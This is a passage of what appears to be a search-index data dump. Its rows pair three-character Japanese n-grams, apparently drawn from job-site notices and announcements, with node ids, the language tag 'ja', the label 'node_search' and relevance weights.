('おりま', 171, 'ja', 'node_search', 0.842342),
('おりま', 173, 'ja', 'node_search', 0.830633),
('おりま', 174, 'ja', 'node_search', 0.776703),
('おりま', 175, 'ja', 'node_search', 0.836446),
('おりま', 176, 'ja', 'node_search', 0.886095),
('おりま', 177, 'ja', 'node_search', 0.769219),
('おりま', 178, 'ja', 'node_search', 0.839384),
('おりま', 182, 'ja', 'node_search', 0.839384),
('おりま', 183, 'ja', 'node_search', 0.771698),
('おりま', 184, 'ja', 'node_search', 0.766757),
('おりま', 185, 'ja', 'node_search', 0.754681),
('おりま', 187, 'ja', 'node_search', 0.769219),
('おりま', 188, 'ja', 'node_search', 0.848323),
('おりま', 189, 'ja', 'node_search', 0.754681),
('おりま', 190, 'ja', 'node_search', 0.802752),
('おりま', 194, 'ja', 'node_search', 0.784336),
('おりま', 197, 'ja', 'node_search', 0.802752),
('おりま', 199, 'ja', 'node_search', 0.759465),
('お二人', 176, 'ja', 'node_search', 1.87957),
('お二人', 184, 'ja', 'node_search', 1),
('お仕事', 162, 'ja', 'node_search', 1.89608),
('お仕事', 177, 'ja', 'node_search', 0.76431),
('お伝え', 3, 'ja', 'node_search', 3.84843),
('お問い', 1, 'ja', 'node_search', 1),
('お問い', 11, 'ja', 'node_search', 27),
('お問い', 155, 'ja', 'node_search', 0.646943),
('お問い', 162, 'ja', 'node_search', 0.625114),
('お問い', 163, 'ja', 'node_search', 0.62674),
('お客様', 27, 'ja', 'node_search', 0.309401),
('お手伝', 1, 'ja', 'node_search', 1),
('お手伝', 62, 'ja', 'node_search', 4),
('お持ち', 163, 'ja', 'node_search', 0.676032),
('お早め', 163, 'ja', 'node_search', 0.63333),
('お楽し', 1, 'ja', 'node_search', 1),
('お気軽', 1, 'ja', 'node_search', 1),
('お気軽', 155, 'ja', 'node_search', 0.653974),
('お知ら', 24, 'ja', 'node_search', 0.445053),
('お知ら', 154, 'ja', 'node_search', 27),
('お知ら', 155, 'ja', 'node_search', 2),
('お知ら', 161, 'ja', 'node_search', 32),
('お知ら', 163, 'ja', 'node_search', 4),
('お知ら', 164, 'ja', 'node_search', 27),
('お知ら', 165, 'ja', 'node_search', 27),
('お知ら', 166, 'ja', 'node_search', 32),
('お知ら', 167, 'ja', 'node_search', 27),
('お知ら', 168, 'ja', 'node_search', 32),
('お知ら', 169, 'ja', 'node_search', 27),
('お知ら', 170, 'ja', 'node_search', 32),
('お知ら', 171, 'ja', 'node_search', 27),
('お知ら', 176, 'ja', 'node_search', 27),
('お知ら', 178, 'ja', 'node_search', 32),
('お知ら', 179, 'ja', 'node_search', 31),
('お知ら', 180, 'ja', 'node_search', 32),
('お知ら', 181, 'ja', 'node_search', 28),
('お知ら', 182, 'ja', 'node_search', 5),
('お知ら', 183, 'ja', 'node_search', 5),
('お知ら', 184, 'ja', 'node_search', 27),
('お知ら', 185, 'ja', 'node_search', 32),
('お知ら', 186, 'ja', 'node_search', 32),
('お知ら', 187, 'ja', 'node_search', 32),
('お知ら', 188, 'ja', 'node_search', 32),
('お知ら', 189, 'ja', 'node_search', 32),
('お知ら', 190, 'ja', 'node_search', 32),
('お知ら', 191, 'ja', 'node_search', 32),
('お知ら', 192, 'ja', 'node_search', 32),
('お知ら', 193, 'ja', 'node_search', 32),
('お知ら', 194, 'ja', 'node_search', 32),
('お知ら', 195, 'ja', 'node_search', 32),
('お知ら', 196, 'ja', 'node_search', 32),
('お知ら', 197, 'ja', 'node_search', 32),
('お知ら', 198, 'ja', 'node_search', 32),
('お知ら', 199, 'ja', 'node_search', 32),
('お知ら', 200, 'ja', 'node_search', 32),
('お祈り', 80, 'ja', 'node_search', 1),
('お祈り', 113, 'ja', 'node_search', 1),
('お祈り', 156, 'ja', 'node_search', 0.980874),
('お祈り', 157, 'ja', 'node_search', 0.863659),
('お祈り', 160, 'ja', 'node_search', 0.848323),
('お祈り', 161, 'ja', 'node_search', 0.896076),
('お祈り', 166, 'ja', 'node_search', 0.876337),
('お祈り', 168, 'ja', 'node_search', 0.879565),
('お祈り', 169, 'ja', 'node_search', 0.810915),
('お祈り', 170, 'ja', 'node_search', 0.889397),
('お祈り', 171, 'ja', 'node_search', 0.797402),
('お祈り', 176, 'ja', 'node_search', 0.819249),
('お祈り', 177, 'ja', 'node_search', 0.729424),
('お祈り', 178, 'ja', 'node_search', 0.800068),
('お祈り', 179, 'ja', 'node_search', 0.742984),
('お祈り', 180, 'ja', 'node_search', 0.808176),
('お祈り', 181, 'ja', 'node_search', 0.810915),
('お祈り', 186, 'ja', 'node_search', 0.776703),
('お祈り', 188, 'ja', 'node_search', 0.769219),
('お祈り', 191, 'ja', 'node_search', 0.816452),
('お祈り', 192, 'ja', 'node_search', 0.786915),
('お祈り', 193, 'ja', 'node_search', 0.802752),
('お祈り', 195, 'ja', 'node_search', 0.824901),
('お祈り', 196, 'ja', 'node_search', 0.805455),
('お祈り', 198, 'ja', 'node_search', 0.78951),
('お祝い', 154, 'ja', 'node_search', 1),
('お祝い', 160, 'ja', 'node_search', 0.923838),
('お祝い', 161, 'ja', 'node_search', 0.980874),
('お祝い', 164, 'ja', 'node_search', 0.953396),
('お祝い', 165, 'ja', 'node_search', 0.896076),
('お祝い', 166, 'ja', 'node_search', 0.96498),
('お祝い', 168, 'ja', 'node_search', 0.968904),
('お祝い', 170, 'ja', 'node_search', 0.980874),
('お祝い', 179, 'ja', 'node_search', 0.794753),
('お祝い', 180, 'ja', 'node_search', 0.879565),
('お祝い', 181, 'ja', 'node_search', 0.882818),
('お祝い', 185, 'ja', 'node_search', 0.836446),
('お祝い', 186, 'ja', 'node_search', 0.824901),
('お祝い', 188, 'ja', 'node_search', 0.833529),
('お祝い', 189, 'ja', 'node_search', 0.851346),
('お祝い', 191, 'ja', 'node_search', 0.889397),
('お祝い', 192, 'ja', 'node_search', 0.851346),
('お祝い', 193, 'ja', 'node_search', 0.869951),
('お祝い', 195, 'ja', 'node_search', 0.892724),
('お祝い', 196, 'ja', 'node_search', 0.876337),
('お祝い', 198, 'ja', 'node_search', 0.851346),
('お祝い', 199, 'ja', 'node_search', 0.851346),
('お見逃', 62, 'ja', 'node_search', 0.516879),
('かけた', 62, 'ja', 'node_search', 4),
('かけて', 24, 'ja', 'node_search', 0.512513),
('かけの', 135, 'ja', 'node_search', 1),
('かげで', 120, 'ja', 'node_search', 1),
('かしな', 163, 'ja', 'node_search', 1),
('かしな', 195, 'ja', 'node_search', 1),
('かった', 3, 'ja', 'node_search', 0.573154),
('かって', 173, 'ja', 'node_search', 0.879565),
('かって', 183, 'ja', 'node_search', 0.842342),
('かなる', 87, 'ja', 'node_search', 0.664818),
('かなプ', 116, 'ja', 'node_search', 1),
('かな伝', 122, 'ja', 'node_search', 0.945829),
('かのよ', 87, 'ja', 'node_search', 0.640063),
('からで', 3, 'ja', 'node_search', 0.938382),
('からの', 9, 'ja', 'node_search', 3),
('からの', 17, 'ja', 'node_search', 4),
('からの', 24, 'ja', 'node_search', 0.4475),
('からも', 160, 'ja', 'node_search', 0.833529),
('からも', 161, 'ja', 'node_search', 0.879565),
('からも', 164, 'ja', 'node_search', 0.808176),
('からも', 173, 'ja', 'node_search', 0.819249),
('からも', 175, 'ja', 'node_search', 0.827757),
('からも', 176, 'ja', 'node_search', 0.794753),
('から午', 5, 'ja', 'node_search', 1),
('から午', 62, 'ja', 'node_search', 1.18249),
('から午', 163, 'ja', 'node_search', 0.800068),
('から厨', 133, 'ja', 'node_search', 1),
('から多', 27, 'ja', 'node_search', 0.415562),
('から差', 8, 'ja', 'node_search', 2),
('から常', 25, 'ja', 'node_search', 1),
('から感', 133, 'ja', 'node_search', 0.805455),
('から指', 138, 'ja', 'node_search', 1),
('から日', 24, 'ja', 'node_search', 0.40128),
('から日', 69, 'ja', 'node_search', 1),
('から日', 142, 'ja', 'node_search', 1),
('から木', 142, 'ja', 'node_search', 1),
('から来', 23, 'ja', 'node_search', 0.630018),
('から渡', 179, 'ja', 'node_search', 0.860547),
('から直', 23, 'ja', 'node_search', 0.860547),
('から直', 27, 'ja', 'node_search', 0.302276),
('から移', 7, 'ja', 'node_search', 1.78895),
('から許', 23, 'ja', 'node_search', 0.693594),
('かれま', 187, 'ja', 'node_search', 0.957226),
('かれる', 8, 'ja', 'node_search', 2),
('かれる', 156, 'ja', 'node_search', 1),
('かれる', 157, 'ja', 'node_search', 0.906287),
('かれる', 167, 'ja', 'node_search', 0.927431),
('か月以', 3, 'ja', 'node_search', 0.613969),
('か質問', 1, 'ja', 'node_search', 1),
('があり', 3, 'ja', 'node_search', 2.24098),
('があり', 5, 'ja', 'node_search', 0.942091),
('があり', 8, 'ja', 'node_search', 4),
('があり', 18, 'ja', 'node_search', 1.9496),
('があり', 30, 'ja', 'node_search', 1.82322),
('があり', 135, 'ja', 'node_search', 0.754681),
('があり', 142, 'ja', 'node_search', 0.66666),
('があり', 155, 'ja', 'node_search', 0.802752),
('があり', 162, 'ja', 'node_search', 0.674137),
('があり', 163, 'ja', 'node_search', 1),
('があり', 191, 'ja', 'node_search', 1),
('があり', 198, 'ja', 'node_search', 0.931053),
('がある', 18, 'ja', 'node_search', 1),
('があれ', 30, 'ja', 'node_search', 0.942091),
('がいの', 188, 'ja', 'node_search', 0.942091),
('がいま', 27, 'ja', 'node_search', 0.309786),
('がうま', 69, 'ja', 'node_search', 1),
('がお手', 62, 'ja', 'node_search', 4),
('がござ', 1, 'ja', 'node_search', 1),
('がすべ', 98, 'ja', 'node_search', 1),
('がそれ', 136, 'ja', 'node_search', 0.953396),
('ができ', 3, 'ja', 'node_search', 0.953396),
('ができ', 23, 'ja', 'node_search', 0.47729),
('ができ', 30, 'ja', 'node_search', 1.84234),
('ができ', 120, 'ja', 'node_search', 1),
('ができ', 122, 'ja', 'node_search', 1),
('ができ', 136, 'ja', 'node_search', 0.752312),
('ができ', 138, 'ja', 'node_search', 0.889397),
('ができ', 147, 'ja', 'node_search', 1),
('ができ', 155, 'ja', 'node_search', 0.945829),
('ができ', 163, 'ja', 'node_search', 0.980874),
('がとう', 135, 'ja', 'node_search', 0.662985),
('がない', 24, 'ja', 'node_search', 0.522445),
('がない', 26, 'ja', 'node_search', 1),
('がなく', 142, 'ja', 'node_search', 0.800068),
('がらご', 190, 'ja', 'node_search', 0.845322),
('がら成', 175, 'ja', 'node_search', 0.909743),
('がら成', 176, 'ja', 'node_search', 0.938382),
('がら成', 177, 'ja', 'node_search', 0.824901),
('がら成', 184, 'ja', 'node_search', 0.836446),
('がら成', 197, 'ja', 'node_search', 0.848323),
('がりま', 178, 'ja', 'node_search', 0.96498),
('がりま', 189, 'ja', 'node_search', 0.869951),
('がりま', 194, 'ja', 'node_search', 0.899454),
('がりま', 197, 'ja', 'node_search', 0.892724),
('がりを', 24, 'ja', 'node_search', 0.36824),
('がるこ', 164, 'ja', 'node_search', 0.836446),
('がるこ', 193, 'ja', 'node_search', 0.909743),
('がる新', 183, 'ja', 'node_search', 27),
('がる機', 192, 'ja', 'node_search', 0.882818),
('がニュ', 181, 'ja', 'node_search', 0.800068),
('がニュ', 182, 'ja', 'node_search', 3.24366),
('がニュ', 183, 'ja', 'node_search', 2.99047),
('が今回', 189, 'ja', 'node_search', 0.896076),
('が今回', 194, 'ja', 'node_search', 0.945829),
('が今回', 197, 'ja', 'node_search', 0.938382),
('が充実', 164, 'ja', 'node_search', 0.892724),
('が充実', 171, 'ja', 'node_search', 0.892724),
('が充実', 174, 'ja', 'node_search', 0.869951),
('が充実', 189, 'ja', 'node_search', 0.792123),
('が切実', 5, 'ja', 'node_search', 3),
('が勉強', 24, 'ja', 'node_search', 0.96498),
('が参加', 3, 'ja', 'node_search', 43),
('が大い', 126, 'ja', 'node_search', 1),
('が大い', 180, 'ja', 'node_search', 0.916736),
('が大い', 186, 'ja', 'node_search', 0.949597),
('が大切', 3, 'ja', 'node_search', 0.509287),
('が始ま', 140, 'ja', 'node_search', 1),
('が始ま', 175, 'ja', 'node_search', 0.957226),
('が定め', 24, 'ja', 'node_search', 0.480114),
('が定め', 26, 'ja', 'node_search', 1),
('が実り', 165, 'ja', 'node_search', 0.851346),
('が実り', 166, 'ja', 'node_search', 0.839384),
('が実り', 178, 'ja', 'node_search', 0.896076),
('が実り', 185, 'ja', 'node_search', 0.78951),
('が実り', 187, 'ja', 'node_search', 0.816452),
('が実を', 171, 'ja', 'node_search', 0.945829),
('が実を', 175, 'ja', 'node_search', 1),
('が実を', 177, 'ja', 'node_search', 0.931053),
('が実を', 178, 'ja', 'node_search', 1),
('が実を', 184, 'ja', 'node_search', 0.942091),
('が実を', 185, 'ja', 'node_search', 1),
('が実を', 187, 'ja', 'node_search', 1),
('が実を', 191, 'ja', 'node_search', 1),
('が実施', 27, 'ja', 'node_search', 0.464545),
('が得ら', 29, 'ja', 'node_search', 3),
('が必要', 3, 'ja', 'node_search', 0.882818),
('が必要', 5, 'ja', 'node_search', 1),
('が必要', 30, 'ja', 'node_search', 5.52703),
('が成功', 133, 'ja', 'node_search', 0.738408),
('が指導', 133, 'ja', 'node_search', 1),
('が授与', 62, 'ja', 'node_search', 0.655756),
('が日本', 80, 'ja', 'node_search', 4),
('が日本', 121, 'ja', 'node_search', 1),
('が日本', 132, 'ja', 'node_search', 1),
('が日本', 138, 'ja', 'node_search', 0.805455),
('が日本', 154, 'ja', 'node_search', 0.784336),
('が日本', 157, 'ja', 'node_search', 27),
('が日本', 181, 'ja', 'node_search', 1),
('が日本', 182, 'ja', 'node_search', 1),
('が日本', 183, 'ja', 'node_search', 1),
('が最優', 98, 'ja', 'node_search', 1),
('が期待', 185, 'ja', 'node_search', 0.860547),
('が期待', 187, 'ja', 'node_search', 0.896076),
('が期待', 193, 'ja', 'node_search', 0.896076),
('が期待', 195, 'ja', 'node_search', 0.957226),
('が期待', 198, 'ja', 'node_search', 0.909743),
('が期待', 199, 'ja', 'node_search', 0.876337),
('が本日', 133, 'ja', 'node_search', 0.938382),
('が残る', 8, 'ja', 'node_search', 2),
('が求め', 189, 'ja', 'node_search', 0.98493),
('が特定', 154, 'ja', 'node_search', 1),
('が特定', 156, 'ja', 'node_search', 0.942091),
('が特定', 160, 'ja', 'node_search', 3.99047),
('が特定', 161, 'ja', 'node_search', 1.74996),
('が特定', 165, 'ja', 'node_search', 3.99983),
('が特定', 166, 'ja', 'node_search', 4.08679),
('が特定', 167, 'ja', 'node_search', 1.81645),
('が特定', 168, 'ja', 'node_search', 1.75946),
('が特定', 169, 'ja', 'node_search', 3.15804),
('が特定', 170, 'ja', 'node_search', 3.98118),
('が特定', 171, 'ja', 'node_search', 1),
('が特定', 173, 'ja', 'node_search', 4.04752),
('が特定', 174, 'ja', 'node_search', 1),
('が特定', 175, 'ja', 'node_search', 1),
('が特定', 176, 'ja', 'node_search', 1.74069),
('が特定', 177, 'ja', 'node_search', 1),
('が特定', 178, 'ja', 'node_search', 1.78178),
('が特定', 179, 'ja', 'node_search', 0.733888),
('が特定', 180, 'ja', 'node_search', 1.80007),
('が特定', 184, 'ja', 'node_search', 1),
('が特定', 185, 'ja', 'node_search', 4.00925),
('が特定', 186, 'ja', 'node_search', 1.76922),
('が特定', 187, 'ja', 'node_search', 3.96276),
('が特定', 188, 'ja', 'node_search', 1.76188),
('が特定', 189, 'ja', 'node_search', 3.99983),
('が特定', 190, 'ja', 'node_search', 4.07688),
('が特定', 191, 'ja', 'node_search', 4.2327),
('が特定', 192, 'ja', 'node_search', 4.11692),
('が特定', 193, 'ja', 'node_search', 4.17901),
('が特定', 194, 'ja', 'node_search', 4.00925),
('が特定', 195, 'ja', 'node_search', 1.80545),
('が特定', 196, 'ja', 'node_search', 4.18961),
('が特定', 197, 'ja', 'node_search', 4.07688),
('が特定', 198, 'ja', 'node_search', 1.78178),
('が特定', 199, 'ja', 'node_search', 4.01872),
('が独自', 142, 'ja', 'node_search', 0.833529),
('が秋田', 141, 'ja', 'node_search', 1),
('が素晴', 199, 'ja', 'node_search', 0.800068),
('が自分', 23, 'ja', 'node_search', 0.507159),
('が行わ', 142, 'ja', 'node_search', 1),
('が規定', 3, 'ja', 'node_search', 0.554747),
('が評価', 120, 'ja', 'node_search', 1),
('が説明', 6, 'ja', 'node_search', 3),
('が遭遇', 138, 'ja', 'node_search', 0.71),
('が重要', 3, 'ja', 'node_search', 0.529288),
('が開か', 187, 'ja', 'node_search', 0.96498),
('が順調', 154, 'ja', 'node_search', 0.968904),
('が順調', 178, 'ja', 'node_search', 0.938382),
('が順調', 187, 'ja', 'node_search', 0.854391),
('が順調', 190, 'ja', 'node_search', 0.896076),
('が順調', 194, 'ja', 'node_search', 0.873132),
('きが順', 178, 'ja', 'node_search', 0.942091),
('きが順', 187, 'ja', 'node_search', 0.857458),
('きが順', 190, 'ja', 'node_search', 0.899454),
('きが順', 194, 'ja', 'node_search', 0.876337),
('きこと', 87, 'ja', 'node_search', 1),
('きこと', 98, 'ja', 'node_search', 1),
('きしめ', 62, 'ja', 'node_search', 0.530446),
('きたい', 5, 'ja', 'node_search', 3),
('きたい', 8, 'ja', 'node_search', 2),
('きたい', 10, 'ja', 'node_search', 3),
('きたい', 23, 'ja', 'node_search', 0.600219),
('きたい', 24, 'ja', 'node_search', 1.95186),
('きたい', 26, 'ja', 'node_search', 1),
('きたい', 163, 'ja', 'node_search', 1),
('きた努', 184, 'ja', 'node_search', 0.968904),
('きた成', 165, 'ja', 'node_search', 0.96498),
('きちん', 23, 'ja', 'node_search', 0.808176),
('きちん', 87, 'ja', 'node_search', 0.927431),
('きです', 3, 'ja', 'node_search', 3),
('きと日', 160, 'ja', 'node_search', 0.873132),
('きと日', 161, 'ja', 'node_search', 0.923838),
('きと日', 166, 'ja', 'node_search', 0.909743),
('きと日', 168, 'ja', 'node_search', 0.913226),
('きと日', 170, 'ja', 'node_search', 0.923838),
('きと日', 179, 'ja', 'node_search', 0.76431),
('きと日', 191, 'ja', 'node_search', 0.842342),
('きと日', 193, 'ja', 'node_search', 0.824901),
('きと日', 195, 'ja', 'node_search', 0.854391),
('きと日', 198, 'ja', 'node_search', 0.810915),
('きない', 3, 'ja', 'node_search', 0.517983),
('きない', 24, 'ja', 'node_search', 0.526987),
('きなチ', 194, 'ja', 'node_search', 1),
('きな一', 160, 'ja', 'node_search', 1),
('きな一', 175, 'ja', 'node_search', 1),
('きな一', 181, 'ja', 'node_search', 0.916736),
('きな一', 190, 'ja', 'node_search', 0.957226),
('きな前', 168, 'ja', 'node_search', 1),
('きな前', 170, 'ja', 'node_search', 1),
('きな前', 180, 'ja', 'node_search', 1),
('きな前', 196, 'ja', 'node_search', 1),
('きな前', 199, 'ja', 'node_search', 1),
('きな喜', 135, 'ja', 'node_search', 0.784336),
('きな姿', 194, 'ja', 'node_search', 0.98493),
('きな姿', 197, 'ja', 'node_search', 0.976851),
('きな成', 174, 'ja', 'node_search', 0.980874),
('きな第', 161, 'ja', 'node_search', 1),
('きな節', 164, 'ja', 'node_search', 1),
('きな節', 171, 'ja', 'node_search', 1),
('きな節', 177, 'ja', 'node_search', 1),
('きな職', 120, 'ja', 'node_search', 0.916736),
('きに覚', 87, 'ja', 'node_search', 16),
('きまし', 19, 'ja', 'node_search', 1),
('きまし', 23, 'ja', 'node_search', 1.81645),
('きまし', 27, 'ja', 'node_search', 1.30166),
('きまし', 87, 'ja', 'node_search', 0.630018),
('きまし', 120, 'ja', 'node_search', 1),
('きまし', 122, 'ja', 'node_search', 1),
('きまし', 147, 'ja', 'node_search', 1),
('きます', 69, 'ja', 'node_search', 1),
('きます', 136, 'ja', 'node_search', 0.747619),
('きます', 138, 'ja', 'node_search', 0.882818),
('きます', 155, 'ja', 'node_search', 0.938382),
('きや日', 186, 'ja', 'node_search', 0.906287),
('きるか', 3, 'ja', 'node_search', 0.945829),
('きるこ', 30, 'ja', 'node_search', 1.84234),
('きるだ', 5, 'ja', 'node_search', 0.749958),
('きるだ', 28, 'ja', 'node_search', 1),
('きるよ', 23, 'ja', 'node_search', 0.475426),
('きる企', 27, 'ja', 'node_search', 0.494765),
('きる学', 24, 'ja', 'node_search', 0.949597),
('きる求', 163, 'ja', 'node_search', 0.972861),
('きれい', 87, 'ja', 'node_search', 0.953396),
('きをか', 62, 'ja', 'node_search', 4),
('きを経', 184, 'ja', 'node_search', 1),
('きサポ', 186, 'ja', 'node_search', 0.863659),
('き専用', 24, 'ja', 'node_search', 0.386142),
('き成長', 62, 'ja', 'node_search', 0.873132),
('き換え', 87, 'ja', 'node_search', 0.672252),
('き添い', 162, 'ja', 'node_search', 0.731649),
('き溶接', 3, 'ja', 'node_search', 0.661163),
('き続き', 3, 'ja', 'node_search', 0.664818),
('き続き', 186, 'ja', 'node_search', 0.869951),
('き金額', 8, 'ja', 'node_search', 2),
('ぎない', 120, 'ja', 'node_search', 1),
('くいき', 69, 'ja', 'node_search', 1),
('くこと', 25, 'ja', 'node_search', 1),
('くこと', 144, 'ja', 'node_search', 1),
('くこと', 147, 'ja', 'node_search', 1),
('くこと', 155, 'ja', 'node_search', 0.705825),
('くこと', 163, 'ja', 'node_search', 0.993146),
('くご覧', 1, 'ja', 'node_search', 1),
('くため', 19, 'ja', 'node_search', 3),
('くため', 98, 'ja', 'node_search', 1),
('くため', 137, 'ja', 'node_search', 1),
('くため', 139, 'ja', 'node_search', 1),
('くため', 143, 'ja', 'node_search', 1),
('くため', 175, 'ja', 'node_search', 1),
('くため', 178, 'ja', 'node_search', 1),
('くため', 184, 'ja', 'node_search', 1),
('くため', 187, 'ja', 'node_search', 1),
('くださ', 1, 'ja', 'node_search', 2),
('くださ', 28, 'ja', 'node_search', 3),
('くださ', 62, 'ja', 'node_search', 4.49176),
('くださ', 69, 'ja', 'node_search', 1.90286),
('くださ', 77, 'ja', 'node_search', 13),
('くださ', 87, 'ja', 'node_search', 2.66666),
('くださ', 120, 'ja', 'node_search', 2),
('くださ', 133, 'ja', 'node_search', 0.869951),
('くださ', 140, 'ja', 'node_search', 0.942091),
('くださ', 155, 'ja', 'node_search', 0.636679),
('くださ', 162, 'ja', 'node_search', 0.615536),
('くださ', 163, 'ja', 'node_search', 0.617112),
('くとい', 160, 'ja', 'node_search', 1),
('くとい', 166, 'ja', 'node_search', 1),
('くとい', 168, 'ja', 'node_search', 1),
('くとい', 170, 'ja', 'node_search', 1),
('くとい', 180, 'ja', 'node_search', 1),
('くとい', 186, 'ja', 'node_search', 1),
('くとい', 190, 'ja', 'node_search', 1),
('くとい', 191, 'ja', 'node_search', 1),
('くとい', 192, 'ja', 'node_search', 1),
('くとい', 196, 'ja', 'node_search', 1),
('くとい', 199, 'ja', 'node_search', 1),
('くとも', 3, 'ja', 'node_search', 1),
('くとも', 18, 'ja', 'node_search', 1),
('くなり', 142, 'ja', 'node_search', 0.794753),
('くのプ', 27, 'ja', 'node_search', 0.874043),
('くの実', 198, 'ja', 'node_search', 0.989021),
('くの成', 174, 'ja', 'node_search', 0.845322),
('くの知', 193, 'ja', 'node_search', 0.980874),
('くの経', 164, 'ja', 'node_search', 0.866793),
('くの経', 167, 'ja', 'node_search', 1),
('くの経', 169, 'ja', 'node_search', 0.945829),
('くの経', 173, 'ja', 'node_search', 0.927431),
('くの経', 175, 'ja', 'node_search', 0.938382),
('くの経', 176, 'ja', 'node_search', 0.968904),
('くの経', 177, 'ja', 'node_search', 0.848323),
('くの経', 184, 'ja', 'node_search', 0.860547),
('くの経', 185, 'ja', 'node_search', 0.953396),
('くの経', 187, 'ja', 'node_search', 0.931053),
('くの経', 190, 'ja', 'node_search', 0.869951),
('くの経', 194, 'ja', 'node_search', 0.848323),
('くの経', 197, 'ja', 'node_search', 0.873132),
('くの賞', 27, 'ja', 'node_search', 0.414157),
('くば市', 163, 'ja', 'node_search', 28.9611),
('くべき', 87, 'ja', 'node_search', 1),
('くよう', 87, 'ja', 'node_search', 1),
('くれた', 69, 'ja', 'node_search', 1),
('くフー', 18, 'ja', 'node_search', 3),
('く受け', 23, 'ja', 'node_search', 0.683725),
('く就職', 133, 'ja', 'node_search', 0.718502),
('く必要', 3, 'ja', 'node_search', 0.646943),
('く必要', 5, 'ja', 'node_search', 0.953396),
('く思っ', 1, 'ja', 'node_search', 1),
('く方に', 7, 'ja', 'node_search', 1.87512),
('く日本', 24, 'ja', 'node_search', 0.779231),
('く日本', 122, 'ja', 'node_search', 1),
('く検索', 28, 'ja', 'node_search', 1),
('く活躍', 136, 'ja', 'node_search', 0.886095),
('く素晴', 116, 'ja', 'node_search', 1),
('く聞い', 87, 'ja', 'node_search', 0.972861),
('く評価', 162, 'ja', 'node_search', 0.860547),
('ぐ架け', 160, 'ja', 'node_search', 0.786915),
('ぐ登録', 62, 'ja', 'node_search', 0.489781),
('けさせ', 27, 'ja', 'node_search', 0.516879),
('けたい', 24, 'ja', 'node_search', 0.35398),
('けたい', 62, 'ja', 'node_search', 4),
('けた大', 160, 'ja', 'node_search', 1),
('けた大', 168, 'ja', 'node_search', 1),
('けた大', 170, 'ja', 'node_search', 1),
('けた大', 180, 'ja', 'node_search', 1),
('けた大', 182, 'ja', 'node_search', 0.953396),
('けた大', 185, 'ja', 'node_search', 1),
('けた大', 188, 'ja', 'node_search', 1),
('けた大', 191, 'ja', 'node_search', 0.976851),
('けた大', 193, 'ja', 'node_search', 1),
('けた大', 196, 'ja', 'node_search', 1),
('けた大', 198, 'ja', 'node_search', 1),
('けた大', 199, 'ja', 'node_search', 1),
('けた強', 192, 'ja', 'node_search', 1),
('けた扉', 62, 'ja', 'node_search', 0.481063),
('けた準', 179, 'ja', 'node_search', 1),
('けた準', 186, 'ja', 'node_search', 1),
('けた準', 195, 'ja', 'node_search', 1),
('けた熱', 166, 'ja', 'node_search', 1),
('けてい', 23, 'ja', 'node_search', 0.468115),
('けてい', 27, 'ja', 'node_search', 0.41),
('けてき', 23, 'ja', 'node_search', 0.819249),
('けてく', 77, 'ja', 'node_search', 4),
('けてく', 140, 'ja', 'node_search', 0.949597),
('けてま', 160, 'ja', 'node_search', 0.759465),
('けて出', 156, 'ja', 'node_search', 1),
('けて出', 157, 'ja', 'node_search', 1),
('けて大', 190, 'ja', 'node_search', 0.968904),
('けて引', 186, 'ja', 'node_search', 0.879565),
('けて準', 142, 'ja', 'node_search', 1),
('けです', 98, 'ja', 'node_search', 1),
('けでな', 24, 'ja', 'node_search', 0.786915),
('けでな', 62, 'ja', 'node_search', 0.738408),
('けでな', 122, 'ja', 'node_search', 1),
('けでな', 136, 'ja', 'node_search', 1),
('けでな', 138, 'ja', 'node_search', 0.968904),
('けでな', 155, 'ja', 'node_search', 1),
('けでな', 182, 'ja', 'node_search', 1),
('けでな', 183, 'ja', 'node_search', 0.989021),
('けでな', 190, 'ja', 'node_search', 1),
('けで十', 5, 'ja', 'node_search', 0.742984),
('けない', 25, 'ja', 'node_search', 1),
('けない', 26, 'ja', 'node_search', 1),
('けに手', 27, 'ja', 'node_search', 0.643484),
('けのビ', 7, 'ja', 'node_search', 1.83569),
('けの必', 135, 'ja', 'node_search', 1),
('けまし', 62, 'ja', 'node_search', 0.476356),
('けます', 138, 'ja', 'node_search', 1),
('けます', 142, 'ja', 'node_search', 0.699655),
('けられ', 3, 'ja', 'node_search', 0.578643),
('けられ', 7, 'ja', 'node_search', 1.8861),
('けられ', 183, 'ja', 'node_search', 0.822065),
('けるこ', 3, 'ja', 'node_search', 0.96498),
('けるこ', 80, 'ja', 'node_search', 1),
('けるこ', 116, 'ja', 'node_search', 1),
('けるこ', 138, 'ja', 'node_search', 0.902857),
('けるた', 6, 'ja', 'node_search', 3),
('けるた', 142, 'ja', 'node_search', 1),
('けるよ', 27, 'ja', 'node_search', 0.304861),
('けるよ', 140, 'ja', 'node_search', 0.886095),
('けるキ', 165, 'ja', 'node_search', 1),
('ける嬉', 179, 'ja', 'node_search', 1),
('ける当', 27, 'ja', 'node_search', 0.446681),
('ける必', 3, 'ja', 'node_search', 1.44712),
('ける必', 142, 'ja', 'node_search', 0.810915),
('ける敬', 122, 'ja', 'node_search', 1),
('ける方', 162, 'ja', 'node_search', 0.655756),
('ける架', 179, 'ja', 'node_search', 0.892724),
('ける機', 23, 'ja', 'node_search', 0.554747),
('ければ', 18, 'ja', 'node_search', 0.916736),
('けレス', 98, 'ja', 'node_search', 19),
('け取り', 23, 'ja', 'node_search', 0.679856),
('け早く', 28, 'ja', 'node_search', 1),
('け橋と', 160, 'ja', 'node_search', 0.781775),
('け橋と', 179, 'ja', 'node_search', 0.882818),
('げます', 133, 'ja', 'node_search', 0.786915),
('げます', 154, 'ja', 'node_search', 1),
('げます', 156, 'ja', 'node_search', 0.957226),
('げます', 157, 'ja', 'node_search', 0.845322),
('げます', 169, 'ja', 'node_search', 0.794753),
('げます', 171, 'ja', 'node_search', 0.781775),
('げます', 176, 'ja', 'node_search', 0.802752),
('げます', 177, 'ja', 'node_search', 0.716357),
('げます', 178, 'ja', 'node_search', 0.784336),
('げます', 195, 'ja', 'node_search', 0.808176),
('げると', 160, 'ja', 'node_search', 0.902857),
('げると', 161, 'ja', 'node_search', 0.957226),
('げると', 164, 'ja', 'node_search', 0.931053),
('げると', 166, 'ja', 'node_search', 0.942091),
('げると', 168, 'ja', 'node_search', 0.945829),
('げると', 170, 'ja', 'node_search', 0.957226),
('げると', 179, 'ja', 'node_search', 0.779231),
('げると', 180, 'ja', 'node_search', 0.860547),
('げると', 181, 'ja', 'node_search', 0.863659),
('げると', 185, 'ja', 'node_search', 0.819249),
('げると', 186, 'ja', 'node_search', 0.808176),
('げると', 188, 'ja', 'node_search', 0.816452),
('げると', 189, 'ja', 'node_search', 0.833529),
('げると', 191, 'ja', 'node_search', 0.869951),
('げると', 192, 'ja', 'node_search', 0.833529),
('げると', 193, 'ja', 'node_search', 0.851346),
('げると', 196, 'ja', 'node_search', 0.857458),
